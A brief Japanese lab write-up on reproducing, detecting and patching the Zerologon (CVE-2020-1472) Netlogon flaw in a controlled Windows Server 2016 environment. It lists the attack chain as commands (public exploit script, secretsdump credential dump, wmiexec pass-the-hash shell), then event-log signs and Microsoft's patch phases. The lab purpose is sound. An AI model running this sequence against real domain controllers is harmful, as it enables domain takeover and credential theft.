Zerologon_CVE-2020-1472
目的
この脆弱性調査は、Windows Server 2016 上で Kali Linux を介して Zerologon をシミュレートし、検出および軽減を目的とした制御環境を構築することを目指しました。主な焦点は、脆弱性の侵入テストを実施し、デスクトップのユーザーとしてログインせずにデスクトップを制御できる可能性を示し、同時に脆弱性を検出および軽減することでした。
習得したスキル
- Windows イベントビューアーに関する高度な理解
- Kali Linux と Impackets の習熟
- Zerologon を実行する能力
使用したツール
Zerologon を実装する手順
Kali Linux
- sudo su で root ユーザーになる
- git clone https://github.com/dirkjanm/CVE-2020-1472
- cd /home/kali/impacket/examples/CVE-2020-1472 (ディレクトリは環境に合わせて変更してください)
- /cve-2020-1472-exploit.py -n [NETBIOS] -t [IPアドレス]
- secretsdump.py -no-pass -just-dc [NETBIOS/ユーザー]$@[IPアドレス]
- wmiexec.py [ドメイン/ユーザー@IP] - hashes [ハッシュ]
Zerologon を識別する手順
Windows
重要 セキュリティ機能を無効にする
- イベントビューアーを確認する
- サーバーマネージャーで、Windows ログ、セキュリティを選択し、イベント ID 4624(ユーザーログオンイベント)を探す
Zerologon の兆候
- ログのサブジェクトが NULL SID という名前であること
- このログオンには管理者権限も付与されていること
- ログ 4742(NT Authority が攻撃者)も確認できます
パッチ適用手順
Microsoft は Windows Server(2008、2016、2019)を保護するための利用可能なパッチを開発しました。これは次のように計画されていました。最初のフェーズでは、最初のパッチ(8月のパッチ)をダウンロードすると、ドメインは他の接続デバイスを非準拠デバイスから保護できます。すべての参加デバイスを明示的な例外付きで保護するオプションが提供されます。
2番目のパッチ(翌年2月のパッチ)は強制フェーズであり、インストールされると、すべての Windows および非 Windows デバイスは Netlogon を使用したセキュアな RPC を強制されます。または、特定の信頼されたデバイスを明示的に許可することもできます。実質的には、非準拠のコンピュータをドメインから追い出します。